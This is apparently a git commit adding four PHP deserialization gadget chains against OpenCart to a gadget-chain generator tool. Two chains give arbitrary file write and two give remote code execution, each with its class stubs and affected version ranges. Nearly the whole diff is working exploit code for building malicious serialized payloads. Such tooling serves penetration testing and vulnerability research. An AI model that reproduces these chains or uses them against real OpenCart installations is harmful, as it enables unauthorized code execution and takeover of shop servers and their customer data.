Merge pull request #199 from mcdruid/opencart

whattheslime · web-flow · commit c3e8187327d9 · 2025-04-09T11:55:44.000+02:00
OpenCart FW1, FW2, RCE1 and RCE2
diff --git a/gadgetchains/OpenCart/FW/1/chain.php b/gadgetchains/OpenCart/FW/1/chain.php
@@ -0,0 +1,26 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class FW1 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '4.0.0.0 <= 4.0.2.3+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'This will stop working when the following:
+    https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38
+    ..is included in a release.';
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \Opencart\System\Library\DB\MySQLi(
+            new \Opencart\System\Library\Session(
+                new \Opencart\System\Library\Log($path),
+                $data
+            )
+        );
+    }
+}
diff --git a/gadgetchains/OpenCart/FW/1/gadgets.php b/gadgetchains/OpenCart/FW/1/gadgets.php
@@ -0,0 +1,38 @@
+<?php
+
+namespace Opencart\System\Library\DB
+{
+    class MySQLi
+    {
+        private object|null $connection;
+
+        function __construct($connection)
+        {
+            $this->connection = $connection;
+        }
+    }
+}
+
+namespace Opencart\System\Library
+{
+    class Session
+    {
+        protected object $adaptor;
+        protected string $session_id;
+
+        public function __construct($adaptor, $session_id)
+        {
+            $this->adaptor = $adaptor;
+            $this->session_id = $session_id;
+        }
+    }
+
+    class Log
+    {
+        private string $file;
+
+        public function __construct($file) {
+            $this->file = $file;
+        }
+    }
+}
diff --git a/gadgetchains/OpenCart/FW/2/chain.php b/gadgetchains/OpenCart/FW/2/chain.php
@@ -0,0 +1,28 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class FW2 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '3.0.3.5 <= 3.0.4.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = '
+      https://seclists.org/fulldisclosure/2022/May/30 describes a Gadget Chain
+      using the Twig_Cache_Filesystem class, presumably in an older release.';
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \DB\MySQLi(
+            new \Session(
+                // new \Twig_Cache_Filesystem(), // OpenCart 3.0.3.3 or older.
+                new \Twig\Cache\FilesystemCache(),
+                $path,
+                $data
+            )
+        );
+    }
+}
diff --git a/gadgetchains/OpenCart/FW/2/gadgets.php b/gadgetchains/OpenCart/FW/2/gadgets.php
@@ -0,0 +1,43 @@
+<?php
+
+namespace DB
+{
+    class MySQLi
+    {
+        private object|null $connection;
+
+        function __construct($connection)
+        {
+            $this->connection = $connection;
+        }
+    }
+}
+
+namespace {
+    class Session
+    {
+        protected object $adaptor;
+        protected string $session_id;
+        public $data;
+
+        public function __construct($adaptor, $session_id, $data)
+        {
+            $this->adaptor = $adaptor;
+            $this->session_id = $session_id;
+            $this->data = $data;
+        }
+    }
+
+    class Twig_Cache_Filesystem
+    {
+        // for OpenCart 3.0.3.3 or older.
+    }
+}
+
+namespace Twig\Cache
+{
+    class FilesystemCache
+    {
+
+    }
+}
diff --git a/gadgetchains/OpenCart/RCE/1/chain.php b/gadgetchains/OpenCart/RCE/1/chain.php
@@ -0,0 +1,25 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '4.0.0.0 < 4.1.0.0';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'This stopped working when this commit landed:
+    https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Opencart\System\Library\DB\MySQLi(
+            new \Opencart\System\Library\Session(
+                new \Opencart\System\Engine\Proxy('write', $function),
+                $parameter
+            )
+        );
+    }
+}
diff --git a/gadgetchains/OpenCart/RCE/1/gadgets.php b/gadgetchains/OpenCart/RCE/1/gadgets.php
@@ -0,0 +1,42 @@
+<?php
+
+namespace Opencart\System\Library\DB
+{
+    class MySQLi
+    {
+        private object|null $connection;
+
+        function __construct($connection)
+        {
+            $this->connection = $connection;
+        }
+    }
+}
+
+namespace Opencart\System\Library
+{
+    class Session
+    {
+        protected object $adaptor;
+        protected string $session_id;
+
+        public function __construct($adaptor, $session_id)
+        {
+            $this->adaptor = $adaptor;
+            $this->session_id = $session_id;
+        }
+    }
+}
+
+namespace Opencart\System\Engine
+{
+    Class Proxy
+    {
+        protected $data = [];
+
+        public function __construct($key, $function)
+        {
+            $this->data[$key] = $function;
+        }
+    }
+}
diff --git a/gadgetchains/OpenCart/RCE/2/chain.php b/gadgetchains/OpenCart/RCE/2/chain.php
@@ -0,0 +1,25 @@
+<?php
+
+namespace GadgetChain\OpenCart;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '4.1.0.0 <= 4.1.0.3+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'This Gadget Chain typically ends up causing
+    errors but not before the payload has been executed.';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \GuzzleHttp\Handler\CurlFactory(
+            new \Aws\ResultPaginator(
+                new \Opencart\System\Engine\Proxy('getCommand', $function),
+                    $parameter
+          ),
+        );
+    }
+}
diff --git a/gadgetchains/OpenCart/RCE/2/gadgets.php b/gadgetchains/OpenCart/RCE/2/gadgets.php
@@ -0,0 +1,45 @@
+<?php
+
+namespace Opencart\System\Engine
+{
+    Class Proxy
+    {
+        protected $data = [];
+
+        public function __construct($key, $function)
+        {
+            $this->data[$key] = $function;
+            // It's not essential to define a callback for 'execute' but doing
+            // so delays hitting errors for few more function calls. Using
+            // print_r here may mean you see the return value of the payload.
+            $this->data['execute'] = 'print_r';
+        }
+    }
+}
+
+
+namespace GuzzleHttp\Handler {
+    class CurlFactory {
+        private $handles = [];
+
+        public function __construct($handle) {
+            $this->handles = $handle;
+        }
+    }
+}
+
+namespace Aws {
+    class ResultPaginator {
+        private $client;
+        private $config;
+        private $operation;
+        private $args = [];
+
+        public function __construct($client, $operation) {
+            $this->config['output_token'] = false;
+            $this->client = $client;
+            $this->operation = $operation;
+         }
+    }
+
+}
